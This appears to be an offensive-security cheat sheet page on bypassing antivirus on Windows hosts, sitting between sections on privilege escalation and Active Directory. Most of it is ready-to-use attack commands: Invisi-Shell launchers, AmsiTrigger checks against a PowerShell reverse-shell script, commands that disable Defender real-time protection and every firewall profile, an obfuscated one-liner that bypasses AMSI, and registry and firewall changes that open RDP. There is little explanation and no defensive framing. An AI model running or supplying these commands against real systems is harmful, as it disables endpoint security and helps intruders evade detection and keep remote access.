AV Bypass

Obfuscation Tools

To Run Invisi-Shell

If Having Admins Privileges:
RunWithPathAsAdmin.bat
Without Admin Privileges
RunWithRegistryNonAdmin.bat

Checking for AMSI Detection

To USE

AmsiTrigger_x64.exe -i Invoke-PowerShellTcp.ps1

For obfuscation of a script

GitHub - danielbohannon/Invoke-Obfuscation: PowerShell ObfuscatorGitHub

Checking For CLM

$ExecutionContext.SesssionState.LanguageMode

Running As Different User

runas /netonly /user:{domain}\user powershell

If you have Administrator Access

set-executionpolicy bypass

set-executionpolicy unrestricted -f

Set-MpPreference -DisableRealtimeMonitoring $true 

Set-MpPreference -DisableIOAVProtection $true

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

AMSI Bypass

s`Et-iTe`m ('V'+( 'ari'+'ab'+'le:')+'soummya')( [tyPe]("{2}{0}{1}"-f'e','F','R')); ( ge`T-VAriAb`LE('soummya') -vAl )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )

Adding RDP Rule

//Using Cmd
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

//Using Powershell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0

Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

PreviousWin Priv NextAbout Active Directory

Last updated 2 years ago